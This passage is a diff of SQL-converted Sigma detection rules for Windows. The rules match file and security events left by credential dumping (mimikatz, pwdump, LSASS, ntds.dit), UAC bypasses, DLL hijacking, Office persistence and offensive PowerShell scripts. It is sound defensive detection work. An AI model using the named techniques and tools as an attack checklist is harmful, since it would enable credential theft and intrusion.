ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' 
ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - 
"description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat 
Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\')))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND 
EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - 
"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + 
"status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Files with 
well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = 
'4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName 
LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR 
ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE 
'\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR 